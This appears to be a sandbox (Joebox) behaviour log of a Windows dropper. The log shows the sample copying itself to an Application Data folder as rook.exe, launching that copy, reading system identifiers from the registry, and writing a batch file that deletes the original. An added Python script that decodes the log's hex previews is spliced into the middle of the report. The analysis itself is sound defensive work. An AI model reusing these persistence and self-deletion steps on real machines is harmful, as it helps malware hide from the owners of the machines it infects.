Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2577062608
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2577255971
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2577310538
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2577564719
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 2E20000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2578782058
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2578870279
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page readonly success or wait 2593479358
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 400000 Length: 1000 New Protection: page readonly Old Protection: page read and write success or wait 2593481097
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 40050A Length: 2446000 New Protection: page execute and read and write Old Protection: page readonly success or wait 2593486565
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E40000 Length: 13FF9C Allocation Type: null Protection: page execute and read and write success or wait 2593555385
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2ED0000 Length: 13FCA4 Allocation Type: null Protection: page execute and read and write success or wait 2593562073
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid object name not found 2593621661
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2593651075
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2593659013
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2593660680
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2595931677
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2595939344
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2595982254
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 7FF0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2596075967
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 7FF0000 Length: 13F8E0 Allocation Type: null Protection: page read and write success or wait 2596272835
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 7FF0000 Length: 13F8E4 Allocation Type: null Protection: page read and write success or wait 2596273149
File opened Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2596414660
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E60000 Length: 13F49C Allocation Type: null Protection: page read and write success or wait 2596415573
File read Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2596415846
Mutant created Name: \BaseNamedObjects\Global\{64307AAF-C4D3-D5D5-FB56-FD56EA1DDE44} success or wait 2597174747
Memory read PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 7C811195 Length: 1 Value: 8B success or wait 2597183029
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 412CC7 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2597183619
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 412CC7 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2597184713
File created Path: C:\Documents and Settings\Administrator\Application Data\Avliy Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 2597186309
File created Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2597248598
File created Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 2597251385
Privilege adjusted Privilege: Security On or off: on success or wait 2597263457
File created Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2597273341
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: ComputerName success or wait 2597307614
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: InstallDate success or wait 2597308153
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 2597308731
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 2597313961
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId success or wait 2597314468
File opened Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2597348351
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E60000 Length: 13ED10 Allocation Type: null Protection: page read and write success or wait 2597349253
File read Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2597349545
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2598354771
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2598355587
File created Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2598356068
File write Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2598491216
File opened Path: C:\Documents and Settings\Administrator\Application Data Access: read attributes and synchronize and generic read Options: synchronous io non alert and open for backup ident Attributes: none Content Overwritten: false success or wait 2598503042
File opened Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2598504137
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2598504690
File opened Path: C:\Documents and Settings\Administrator\Application Data\Avliy Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 2598505275
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2598516126
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 2598546806
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 7FF0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2598626676
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 2E60000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2598746733
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2598773450
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8070000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2598780552
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: query and read Type: commit Baseaddress: 2E60000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2599028868
Process created PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Cmdline: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Createflags: 0 success or wait 2599034249
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2667129021
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 2667195192
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 244 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 success or wait 2667199320
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 2E60000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2667207391
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8070000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2667210847
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 81A0000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2667271179
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 81A0000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2667282721
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 81A0000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2667292319
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 81A0000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2667301866
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 8070000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2667312172
Process created PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Createflags: 0 success or wait 2667319224
Process terminated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 2787134060
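The "Value:" field on the file read of the dropper, the file write of rook.exe and the write of tmpac8d1274.bat above is a hex dump of only the first 100 bytes of each buffer; the real transfer size is in "Length:" (257536 and 244 bytes). Decoding those previews by hand is error-prone, so the following Python script, an added example that is not part of the Joebox report, parses such lines, decodes the preview, reports whether it was cut short, reads the DOS-header fields that fit inside the preview, and compares the read of the dropper with the write of rook.exe. The three sample lines are copied from this report; the regular expression describing the line layout and all function names are my assumptions about the export format.

```python
"""Decode the hex 'Value:' previews in Joebox 'File read' / 'File write' lines.

Added example, not part of the Joebox report. The SAMPLE_* lines are copied
from this report; the line-layout regex and the function names are my own
assumptions about the export format.
"""
import re
import struct
from dataclasses import dataclass

# Hex preview shared by the read of the dropper and the write of rook.exe
# (the report prints the identical bytes for both operations).
_PE_HEX = (
    "4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 "
    "54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65"
)
_BAT_HEX = (
    "40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 "
    "20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B "
    "74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 "
    "65 78 69 73"
)
SAMPLE_DROPPER_READ = (r"File read Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe "
                       "Offset: none Length: 257536 Value: " + _PE_HEX + " success or wait 2597349545")
SAMPLE_ROOK_WRITE = (r"File write Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe "
                     "Offset: none Length: 257536 Value: " + _PE_HEX + " success or wait 2598491216")
SAMPLE_BAT_WRITE = (r"File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat "
                    "Offset: none Length: 244 Value: " + _BAT_HEX + " success or wait 2667199320")

# Assumed layout: the hex run ends where the completion text ("success or wait" etc.) begins.
_LINE_RE = re.compile(
    r"^File (?P<op>read|write) Path: (?P<path>.+?) Offset: (?P<offset>\S+) "
    r"Length: (?P<length>\d+) Value: (?P<hex>(?:[0-9A-Fa-f]{2} ?)+)"
)


@dataclass
class FileOp:
    op: str
    path: str
    length: int      # bytes actually transferred, from 'Length:'
    preview: bytes   # decoded 'Value:' bytes, a prefix of the buffer

    @property
    def truncated(self) -> bool:
        return len(self.preview) < self.length

    @property
    def is_pe_candidate(self) -> bool:
        # 'MZ' magic; 'MZP' (0x50 at offset 2) is what the Borland/Delphi linker writes.
        return self.preview[:2] == b"MZ"

    @property
    def e_lfanew(self):
        # Offset of the PE header sits at DOS-header offset 0x3C (4 bytes, little-endian).
        if not self.is_pe_candidate or len(self.preview) < 0x40:
            return None
        return struct.unpack_from("<I", self.preview, 0x3C)[0]

    def printable_runs(self, min_len: int = 6) -> list:
        # ASCII runs of at least min_len bytes: enough to surface a DOS-stub
        # message or the body of a batch script.
        return [m.group().decode("ascii")
                for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, self.preview)]


def parse_file_op(line: str):
    """Return a FileOp for a 'File read'/'File write' line, or None for any other line."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    return FileOp(op=m.group("op"), path=m.group("path"),
                  length=int(m.group("length")),
                  preview=bytes.fromhex(m.group("hex").replace(" ", "")))


def same_preview(a: FileOp, b: FileOp) -> bool:
    """True when both operations moved the same number of bytes and the visible
    prefix matches: all the evidence the report gives for a byte-for-byte copy."""
    return a.length == b.length and a.preview == b.preview


def summarize(op: FileOp) -> dict:
    """Flat summary of one operation, suitable for a triage table."""
    return {"op": op.op, "path": op.path, "bytes": op.length,
            "preview_bytes": len(op.preview), "truncated": op.truncated,
            "mz": op.is_pe_candidate, "e_lfanew": op.e_lfanew,
            "strings": op.printable_runs()}


if __name__ == "__main__":
    ops = [parse_file_op(s) for s in (SAMPLE_DROPPER_READ, SAMPLE_ROOK_WRITE, SAMPLE_BAT_WRITE)]
    for op in ops:
        print(summarize(op))
    print("dropper read and rook.exe write previews identical:", same_preview(ops[0], ops[1]))
```

Run stand-alone it prints one summary per sample line. What the decoded previews show: the dropper read and the rook.exe write carry the same 257536 bytes with identical previews, consistent with the dropper copying itself to Application Data\Avliy\rook.exe and then starting that copy (PID 488); the header starts with "MZP", e_lfanew is 0x100 and the stub text begins "This program must be", which is the Borland/Delphi linker's DOS stub; the batch file opens with a ":d" label, a del of the dropper's own Desktop path and a cut-off "if exis", so the visible part is a self-delete of the original, and nothing beyond byte 100 of the 244 is on the page. The 1601 timestamps in the two BasicInformation operations on rook.exe are zero FILETIME values; in a FileBasicInformation set request a zero time field means "leave unchanged", so this reads as an attribute change to archive and temporary rather than timestamp tampering.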
+ Sections
+ General
Start time: 05:44:26
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s 0.7663042396006076.exe
Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\0.7663042396006076.exe write and read and execute unknown 8C0000 262144 own pid read write object name not found 1 1001DBE
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe query and write and read and execute image 1010000 38506496 own pid read write conflicting addresses 1 1001DBE
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Children TID Window Handles Completion Count Source Address
0 0 false 508 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2576144936
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2576148875
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2576153184
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2576164493
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2576168884
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2576172434
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2576174026
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2576174403
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2576177383
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2576184755
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2576190804
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2576198118
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2576217318
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2576218555
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2576236660
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2576260896
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2576263877
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2576279922
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2576298710
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2576301206
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2576305956
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2576312994
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2576317711
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2576332029
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2576347874
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2576349363
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2576363457
